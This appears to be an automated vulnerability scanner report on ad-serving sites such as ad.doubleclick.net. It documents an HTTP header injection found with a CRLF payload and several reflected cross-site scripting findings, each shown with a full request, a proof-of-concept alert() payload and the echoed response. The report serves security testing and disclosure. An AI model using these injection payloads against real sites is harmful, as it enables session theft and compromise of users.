<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9fae7%0d%0ae1ef4895d68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9fae7%0d%0ae1ef4895d68/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9fae7
e1ef4895d68
/N3285.google/B2343920.122;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 06 Jul 2011 11:56:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)
There are 100 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and user input should be HTML-encoded at any point where it is copied into application responses, so that HTML metacharacters such as < > " ' and = are replaced with the corresponding HTML entities.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439b8"-alert(1)-"4e414bdc8a7 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4883
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:56:12 GMT
Expires: Wed, 06 Jul 2011 11:56:12 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7https://www.lowermybills.com/lending/home-refinance/?sourceid=55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 7
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78e9e"-alert(1)-"df15dde4672 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
BCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "op
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f014"-alert(1)-"d85abfc7b06 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:56:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "fal
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36475"-alert(1)-"4e6b3b90217 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
GZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
...[SNIP]...

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b7d2"-alert(1)-"e1bf4c111b8 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4922
Date: Wed, 06 Jul 2011 11:56:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
ZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42744246");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b5"-alert(1)-"f722fd7d7a6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:33 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b3c/f/1d6/%2a/k%3B231248095%3B0-0%3B0%3B55400195%3B3454-728/90%3B42236289/42254076/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le73b5"-alert(1)-"f722fd7d7a6&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhz
...[SNIP]...

2.7. http://adonmax.com/afr.php [campaignid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The value of the campaignid request parameter is copied into the HTML document as plain text between tags. The payload d4501<script>alert(1)</script>6546b61c730 was submitted in the campaignid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.comd4501<script>alert(1)</script>6546b61c730 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
